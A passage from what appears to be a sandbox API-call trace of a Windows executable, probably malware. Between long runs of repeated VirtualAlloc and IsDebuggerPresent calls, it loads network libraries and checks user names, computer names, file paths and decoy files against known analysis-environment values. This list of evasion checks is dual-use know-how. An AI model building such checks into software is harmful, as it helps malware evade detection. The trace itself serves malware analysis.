flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.045] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.046] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.047] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.048] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.205] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.210] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.219] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.219] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.219] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.219] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.219] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.219] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.219] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.371] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.371] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.371] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.371] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.371] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.371] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.371] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.371] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.371] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.371] GetUserNameA (in: lpBuffer=0x12fb5c, pcbBuffer=0x12f958 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x12f958) returned 1 [0048.375] GetComputerNameA (in: lpBuffer=0x12fa5c, nSize=0x12f958 | out: lpBuffer="F71GWAT", nSize=0x12f958) returned 1 [0048.375] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x12f95c, nSize=0x12f958 | out: lpBuffer="F71gwat", nSize=0x12f958) returned 1 [0048.375] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0048.376] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0048.376] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0048.376] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0048.376] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0048.376] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0048.376] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.377] CloseHandle (hObject=0xffffffff) returned 0 [0048.377] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.377] CloseHandle (hObject=0xffffffff) returned 0 [0048.377] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0048.377] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12fb68, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe")) returned 0x2e [0048.377] StrStrIA (lpFirst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpSrch="sample") returned 0x0 [0048.377] StrStrIA (lpFirst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpSrch="mlwr_smpl") returned 0x0 [0048.377] StrStrIA (lpFirst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpSrch="artifact.exe") returned 0x0 [0048.377] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.377] IsDebuggerPresent () returned 0 [0048.377] IsDebuggerPresent () returned 0 [0048.377] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.378] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.379] IsDebuggerPresent () returned 0 [0048.379] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.380] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.381] IsDebuggerPresent () returned 0 [0048.381] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.382] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] IsDebuggerPresent () returned 0 [0048.383] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.383] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.384] IsDebuggerPresent () returned 0 [0048.385] IsDebuggerPresent () returned 0 [0048.385] IsDebuggerPresent () returned 0 [0048.385] IsDebuggerPresent () returned 0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, 